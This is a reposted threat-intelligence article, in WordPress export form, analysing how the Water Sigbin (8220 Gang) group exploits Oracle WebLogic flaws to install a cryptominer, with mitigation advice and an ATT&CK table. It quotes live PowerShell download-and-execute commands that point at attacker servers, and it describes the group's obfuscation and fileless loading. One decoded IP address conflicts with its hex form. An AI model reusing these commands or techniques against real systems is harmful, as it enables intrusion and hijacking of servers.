{"id":56188,"date":"2024-05-30T00:00:00","date_gmt":"2024-05-30T00:00:00","guid":{"rendered":"urn:uuid:6542c108-3538-9f4a-5029-b67c689379c0"},"modified":"2024-05-30T00:00:00","modified_gmt":"2024-05-30T00:00:00","slug":"decoding-water-sigbins-latest-obfuscation-tricks","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/","title":{"rendered":"Decoding Water Sigbin&#8217;s Latest Obfuscation Tricks"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/8220-24-cover:Large?qlt=80\"><!-- OneTrust Cookies Consent Notice start for trendmicro.com --><!-- OneTrust Cookies Consent Notice end for trendmicro.com --> <head> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width\"> <meta name=\"description\" content=\"Water Sigbin exploited the Oracle WebLogic vulnerabilities CVE-2017-3506 and CVE-2023-21839 to deploy a cryptocurrency miner using a PowerShell script. 
The threat actor also adopted new techniques to conceal its activities, making attacks harder to defend against.\"> <meta name=\"robots\" content=\"index,follow\"> <meta name=\"keywords\" content=\"cloud,exploits &amp; vulnerabilities,research,reports,apt &amp; targeted attacks,endpoints,articles, news, reports,report\"> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\"> <meta name=\"template\" content=\"article1withouthero\"> <meta property=\"article:published_time\" content=\"2024-05-30\"> <meta property=\"article:tag\" content=\"apt &amp; targeted attacks\"> <meta property=\"article:section\" content=\"research\"> <link rel=\"icon\" type=\"image\/ico\" href=\"\/content\/dam\/trendmicro\/favicon.ico\"> <link rel=\"canonical\" href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/e\/decoding-8220-latest-obfuscation-tricks.html\"> <title>Decoding Water Sigbin&#8217;s Latest Obfuscation Tricks | Trend Micro (US)<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\">\n<link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendmicro\/clientlibs\/trendmicro-core-2\/clientlibs\/header-footer.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/e\/decoding-8220-latest-obfuscation-tricks.html\"><br \/>\n<meta property=\"og:title\" content=\"Decoding Water Sigbin's Latest Obfuscation Tricks\"><br \/>\n<meta property=\"og:description\" content=\"Water Sigbin exploited the Oracle WebLogic vulnerabilities CVE-2017-3506 and CVE-2023-21839 to deploy a cryptocurrency miner using a PowerShell script. 
The threat actor also adopted new techniques to conceal its activities, making attacks harder to defend against.\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/24\/8220-24-cover.png\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"Decoding Water Sigbin's Latest Obfuscation Tricks\"><br \/>\n<meta name=\"twitter:description\" content=\"Water Sigbin exploited the Oracle WebLogic vulnerabilities CVE-2017-3506 and CVE-2023-21839 to deploy a cryptocurrency miner using a PowerShell script. The threat actor also adopted new techniques to conceal its activities, making attacks harder to defend against.\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/24\/8220-24-cover.png\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"50.828363154407\"> <!-- Page Scroll: Back to Top --> <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a> <!-- \/* Data Layers *\/ --> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"255260790\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"8.7954545454545\">\n<div class=\"article-details\" role=\"heading\" readability=\"37.136363636364\"> <span 
class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">APT &amp; Targeted Attacks<\/p>\n<p class=\"article-details__description\">Water Sigbin (aka the 8220 Gang) exploited Oracle WebLogic vulnerabilities to deploy a cryptocurrency miner using a PowerShell script. The threat actor also adopted new techniques to conceal its activities, making attacks harder to defend against.<\/p>\n<p class=\"article-details__author-by\">By: Sunil Bharti <time class=\"article-details__date\">May 30, 2024<\/time> <span>Read time:&nbsp;<\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<div class=\"article-details__icons\"> <!--Add This--> <\/p>\n<div class=\"a2a_kit a2a_default_style\" data-a2a-icon-color=\"#717172\"> <a class=\"a2a_dd addthis_link\" href=\"https:\/\/www.addtoany.com\/share\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/share-more.svg\" class=\"svg-icon\" alt=\"Share\"> <\/a> <a class=\"a2a_button_print addthis_link\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/printer.svg\" class=\"svg-icon\" alt=\"Print\"> <\/a> <\/div>\n<p> <!--Add to Folio--> <!--Subscribe--> <\/div>\n<\/div><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-lg-8 col-lg-push-2\"> <\/p>\n<div class=\"richText\" readability=\"42.209628008753\">\n<div readability=\"30.430196936543\">\n<ul>\n<li><span class=\"rte-red-bullet\">Water Sigbin exploited the vulnerabilities CVE-2017-3506 and CVE-2023-21839 to deploy a cryptocurrency miner via a PowerShell script.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The gang employed obfuscation techniques, such as hexadecimal encoding of URLs and using HTTP over port 443, allowing for stealthy payload delivery.<br 
\/><\/span><\/li>\n<li><span class=\"rte-red-bullet\">The PowerShell script and the resulting batch file involved complex encoding, using environment variables to hide malicious code within seemingly benign script components.<br \/><\/span><\/li>\n<li><span class=\"rte-red-bullet\">The group performed fileless execution by using .NET reflection techniques in PowerShell scripts, which allows the malware code to run solely in memory, avoiding disk-based detection mechanisms.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The continuous evolution of threat actor tactics, techniques, and procedures (TTPs) highlights the need for organizations to remain vigilant and adopt various cybersecurity best practices, like regular patch management, employee training, and incident response plans.<\/span><\/li>\n<\/ul>\n<p>Water Sigbin (aka the 8220 Gang) is a China-based threat actor that has been active since at least 2017. It focuses on deploying cryptocurrency-mining malware, primarily in cloud-based environments and Linux servers. The group has been known to integrate vulnerability exploitation as part of its wide array of TTPs.<\/p>\n<p>In our previous discussion on the <a href=\"https:\/\/www.trendmicro.com\/en_za\/research\/23\/e\/8220-gang-evolution-new-strategies-adapted.html\">group&#8217;s tactics<\/a>, we looked into how it operates using ever-evolving and complex methods. However, cyberthreats rarely remain stagnant, with threat actors constantly finding new ways to outsmart defenders. 
Recently, we\u2019ve observed Water Sigbin using new techniques and methods to hide its activities, making the group\u2019s attacks more difficult to defend against.<\/p>\n<p>We found the threat actor exploiting vulnerabilities in Oracle WebLogic Server <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-3506\">CVE-2017-3506<\/a> (a vulnerability allowing remote OS command execution) and <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-21839\">CVE-2023-21839<\/a> (an insecure deserialization vulnerability) to deploy a cryptocurrency miner via a PowerShell script named <i>bin.ps1<\/i> on the victim host. Upon closer examination of the group\u2019s tactics, techniques, and procedures (TTPs), we determined the exploitation to be the work of Water Sigbin, indicating that it is continuously updating its deployment scripts and tools.<\/p>\n<p>We observed the following attack payload for CVE-2017-3506:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig1.jpg\" alt=\"Figure 1. The attack payload for CVE-2017-3506\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 1. 
The attack payload for CVE-2017-3506<\/figcaption><\/div>\n<\/figure><\/div>\n<div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>The&nbsp;base64-encoded string in the attack payload is the following:<\/p>\n<p><span class=\"blockquote\">powershell &#8220;IEX(New-Object Net.WebClient).DownloadString(&#8216;http:\/\/0xb9ac8092:443\/bin.ps1&#8217;)&#8221;<\/span><\/p>\n<p>Meanwhile, the attack payload for CVE-2023-21839 can be seen in Figure 2.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig2.jpg\" alt=\"Figure 2. The attack payload for CVE-2023-21839\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 2. The attack payload for CVE-2023-21839<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"39.5\">\n<div readability=\"24\">\n<p>For this exploit, the base64 encoded string in attack payload is:<\/p>\n<p><span class=\"blockquote\">powershell &#8220;IEX(New-Object Net.WebClient).DownloadString(&#8216;http:\/\/185.172.128.146:443\/bin.ps1&#8217;)&#8221;<\/span><\/p>\n<p>We found exploitation attempts in both Linux and Windows machines, with the threat actor deploying shell scripts in the former and a PowerShell script in the latter. 
For our analysis, we will refer to the techniques used in the Windows version of the exploitation, which shows&nbsp; a noteworthy obfuscation technique used by Water Sigbin.<\/p>\n<p>At the outset of payload delivery during vulnerability exploitation, the threat actor used the following techniques to evade detection:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Implementation of hexadecimal encoding for URLs:<br \/><\/span><\/li>\n<\/ul>\n<p>The URL used to download and deploy the PowerShell script is depicted in the following&nbsp; image:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig3.jpg\" alt=\"Figure 3. Hex encoding of the URL\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 3. Hex encoding of the URL<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>The dotted decimal notation of this URL translates to <i>http:\/\/187.172.128.146:443\/bin[.]ps1<\/i><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Employing HTTP over port 443:<br \/><\/span><\/li>\n<\/ul>\n<p>As seen in the previous URL, Water Sigbin uses HTTP on port 443 for stealthy communication.<\/p>\n<p>The <i>bin.ps1<\/i> shell script file consists of two parts:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol>\n<li>A lengthy base64-encoded string containing the binary code and instructions to execute it<\/li>\n<li>A function responsible for decoding the base64 string, writing the decoded contents into a file named <i>microsoft_office365.bat<\/i> in temporary directory, and silently executing it<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" 
src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig4a.jpg\" alt=\"Figure 4. Content of bin.ps1 PowerShell script\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 4. Content of bin.ps1 PowerShell script<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>The base64-encoded content decoded by the <i>Convert-Base64ToFileAndExecuteSilently<\/i> function in the <i>bin.ps1<\/i> file reveals the core script elements. This decoded content is then written to the temporary directory under the file name <i>microsoft_office365.bat<\/i>.<\/p>\n<h2><span class=\"body-subhead-title\">Analysis of microsoft_office365.bat<\/span><\/h2>\n<p>The <i>microsoft_office365.bat<\/i> script employs environment variables to obfuscate the original script code, making it seem complex and confusing. The script commences with the following code:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig5.jpg\" alt=\"Figure 5. Initial code of the script \u201cmicrosoft_office365.bat\u201d\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 5. Initial code of the script \u201cmicrosoft_office365.bat\u201d<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<p>While examining the script, we observed that it seems like environment variables are being set, which seem like unreadable or gibberish data. 
However, after thorough analysis, it became clear that the threat actors had implemented a very effective method of hiding their malicious code.<\/p>\n<p>To get the actual code, we need to decode the first \u201cif\u201d condition:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig6.jpg\" alt=\"Figure 6. If condition in \u201cmicrosoft_office365.bat\u201d\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 6. If condition in \u201cmicrosoft_office365.bat\u201d<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>Next, we need to replace <i>RxEGj<\/i> with an empty string (\u201c\u201d) in every part of the code. After doing this, the first part of the script will look like the following:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig7.jpg\" alt=\"Figure 7. Decoded first part of the script\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 7. 
Decoded first part of the script<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"35.309139784946\">\n<div readability=\"15.913978494624\">\n<p>The initial command <i>cmd \/c &#8220;set __=&amp;rem\u201d <\/i>runs a new command prompt, sets the \u201c__\u201d environment variable to an empty string, and then executes the <a href=\"https:\/\/home.csulb.edu\/~murdock\/rem.html#:~:text=Purpose%3A%20Provides%20a%20way%20to,on)%20into%20a%20batch%20file.&amp;text=During%20execution%20of%20a%20batch,space%2C%20tab%2C%20and%20comma.\"><i>rem<\/i><\/a> command (which records comments in a batch file and otherwise does nothing). Overall, the script section appears to be designed to start a new command prompt window in minimized mode and then exit the current script.<\/p>\n<p>The next two lengthy lines of base64-encoded content contain the actual binary code, which requires processing before it can be used. The attacker employs PowerShell methods for this processing.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig8.jpg\" alt=\"Figure 8. Encoded malicious binary code\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 8. 
Encoded malicious binary code<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>The next section contains obfuscated PowerShell code, which does all the processing on the base64-encoded string for further usage.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a class=\"bs-modal\" id=\"643b30\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig9.jpg\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig9.jpg\" alt=\"Figure 9. Obfuscated PowerShell code\"> <\/a> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 9. Obfuscated PowerShell code<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>Similarly, if we deobfuscate the remaining section by replacing <i>RxEGj <\/i>with an empty string (&#8220;&#8221;), we will obtain the actual PowerShell code:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a class=\"bs-modal\" id=\"3971d7\" href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig10.jpg\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/fig10.jpg\" alt=\"Figure 10. Decoded PowerShell code\"> <\/a> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 10. 
Decoded PowerShell code<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"44.44480620155\">\n<div readability=\"33.957829457364\">\n<p>This PowerShell command performs the following actions:<\/p>\n<ol>\n<li>Decodes the base64 string <i>([Convert]::FromBase64String)<\/i><\/li>\n<li>Decrypts the very long decoded string with AES <i>([System.Security.Cryptography.Aes])<\/i><\/li>\n<li>Decompresses the decrypted string <i>([IO.Compression.CompressionMode])<\/i><\/li>\n<li>Executes the malware code in memory via .NET reflection <i>([System.Reflection.Assembly])<\/i><\/li>\n<\/ol>\n<p>By leveraging &#8220;System.Reflection.Assembly,&#8221; the attacker orchestrates a fileless execution strategy, ensuring that all operations occur solely in memory. Fileless execution sidesteps file-based scanning, but the decoded script and the loaded assembly remain observable to defenders through PowerShell script block logging and AMSI-integrated endpoint tooling.<\/p>\n<p>Water Sigbin&#8217;s activities involving the exploitation of CVE-2017-3506 and CVE-2023-21839 underscore the adaptability of modern threat actors. The use of sophisticated obfuscation techniques such as hexadecimal encoding of URLs, complex encoding within PowerShell and batch scripts, use of environment variables, and layered obfuscation to conceal malicious code within seemingly benign scripts demonstrates that Water Sigbin is a threat actor that can capably hide its tracks, making detection and prevention more challenging for security teams.<\/p>\n<p>These evolving tactics signify a need for constant vigilance and proactive countermeasures to safeguard systems and networks against sophisticated threats.<\/p>\n<p>To effectively protect systems and networks against vulnerability exploitation such as that carried out by Water Sigbin, organizations can implement a variety of cybersecurity best practices and proactive defense measures. Here are some recommendations:<\/p>\n<ol>\n<li><b>Patch management<\/b>. Prioritize regular updates and patch management processes to ensure that all systems are running the latest software versions. 
Quickly apply security patches for known vulnerabilities, especially those with publicly available exploits.<\/li>\n<li><b>Network segmentation<\/b>. Use network segmentation to reduce the attack surface. By separating critical network segments from the larger network, the impact of a potential vulnerability exploitation can be minimized.<\/li>\n<li><b>Regular security audits<\/b>. Conduct security audits and vulnerability assessments regularly to identify and remediate potential weaknesses within the infrastructure before they can be exploited.<\/li>\n<li><b>Security awareness training<\/b>. Educate employees about the common tactics used by attackers so they can recognize and avoid falling victim to social engineering attacks that might precede vulnerability exploitation.<\/li>\n<li><b>Incident response plan<\/b>. Develop, test, and maintain an incident response plan so your organization can respond quickly and effectively to any security breach or vulnerability exploitation.<\/li>\n<li><b>Threat intelligence<\/b>. 
Subscribe to threat intelligence feeds to stay informed about the latest threats and tactics used by threat actors and advanced persistent threat (APT) groups.<\/li>\n<\/ol>\n<p>The following protections exist to detect malicious activity and shield Trend customers against the exploitation of the vulnerabilities discussed in this blog entry:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">1011716 &#8211; Oracle Weblogic Server Insecure Deserialization Vulnerability (CVE-2023-21839)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">1010550 &#8211; Oracle WebLogic WLS Security Component Remote Code Execution Vulnerability (CVE-2017-3506)<\/span><\/li>\n<\/ul>\n<p>The indicators of compromise for this entry can be found <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/e\/decoding-the-8220-gang-latest-obfuscation-tricks\/decoding-the-8220-gangs-latest-obfuscation-tricks.txt\">here<\/a>.<\/p>\n<p><span class=\"body-subhead-title\">MITRE ATT&amp;CK&nbsp;<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\" width=\"100%\" height=\"10%\">\n<tbody readability=\"8\">\n<tr>\n<th scope=\"col\"><b>&nbsp;Tactic<\/b><\/th>\n<th scope=\"col\"><b>Technique<\/b><\/th>\n<th scope=\"col\"><b>Technique ID<\/b><\/th>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"17\" width=\"154\">Initial Access&nbsp;&nbsp;<\/td>\n<td width=\"154\">Exploit Public-Facing Application<\/td>\n<td width=\"154\">T1190<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"17\" width=\"154\">Execution&nbsp;&nbsp;<\/td>\n<td width=\"154\">Command and Scripting Interpreter: PowerShell&nbsp;<\/td>\n<td width=\"154\">T1059.001&nbsp;<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td rowspan=\"5\" height=\"85\" width=\"154\">Defense Evasion<\/td>\n<td width=\"154\">Deobfuscate\/Decode Files or Information<\/td>\n<td width=\"154\">T1140&nbsp;<\/td>\n<\/tr>\n<tr 
readability=\"2\">\n<td height=\"17\" width=\"154\">Obfuscated Files or Information: Command Obfuscation&nbsp;<\/td>\n<td width=\"154\">T1027.010<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"17\" width=\"154\">Hide Artifacts:&nbsp;Hidden Window<\/td>\n<td width=\"154\">T1564.003<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"17\" width=\"154\">Process Injection: Portable Executable Injection<\/td>\n<td width=\"154\">T1055.002<\/td>\n<\/tr>\n<tr>\n<td height=\"17\" width=\"154\">Reflective Code Loading<\/td>\n<td width=\"154\">T1620<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td rowspan=\"3\" height=\"51\" width=\"154\">Command and Control<\/td>\n<td width=\"154\">Data Encoding: Standard Encoding&nbsp;<\/td>\n<td width=\"154\">T1132.001&nbsp;<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"17\" width=\"154\">Application Layer Protocol: Web Protocols&nbsp;<\/td>\n<td width=\"154\">T1071.001&nbsp;<\/td>\n<\/tr>\n<tr>\n<td height=\"17\" width=\"154\">Ingress Tool Transfer<\/td>\n<td width=\"154\">T1105<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <!-- \/* Core functionality javascripts, absolute URL to leverage Akamai CDN *\/ --> <!--For Modal-start--> <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p> <!--For Modal-end--> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/e\/decoding-8220-latest-obfuscation-tricks.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Water Sigbin (aka the 8220 Gang) exploited the Oracle WebLogic vulnerabilities CVE-2017-3506 and CVE-2023-21839 to deploy a cryptocurrency miner using a PowerShell script. The threat actor also adopted new techniques to conceal its activities, making attacks harder to defend against. 
Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9546,9510,9520,9508,9555,9516,9509],"class_list":["post-56188","post","type-post","status-publish","format-standard","hentry","category-trendmicro","tag-trend-micro-research-apttargeted-attacks","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-cloud","tag-trend-micro-research-endpoints","tag-trend-micro-research-exploitsvulnerabilities","tag-trend-micro-research-reports","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.9 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Decoding Water Sigbin&#039;s Latest Obfuscation Tricks 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Decoding Water Sigbin&#039;s Latest Obfuscation Tricks 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/decoding-water-sigbins-latest-obfuscation-tricks\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2024-05-30T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/8220-24-cover:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Decoding Water Sigbin&#8217;s Latest Obfuscation 
Tricks\",\"datePublished\":\"2024-05-30T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/\"},\"wordCount\":1486,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/8220-24-cover:Large?qlt=80\",\"keywords\":[\"Trend Micro Research : APT&amp;Targeted Attacks\",\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cloud\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Exploits&amp;Vulnerabilities\",\"Trend Micro Research : Reports\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decoding-water-sigbins-latest-obfuscation-tricks\\\/\",\"name\":\"Decoding Water Sigbin's Latest Obfuscation Tricks 2026 | ThreatsHub Cybersecurity 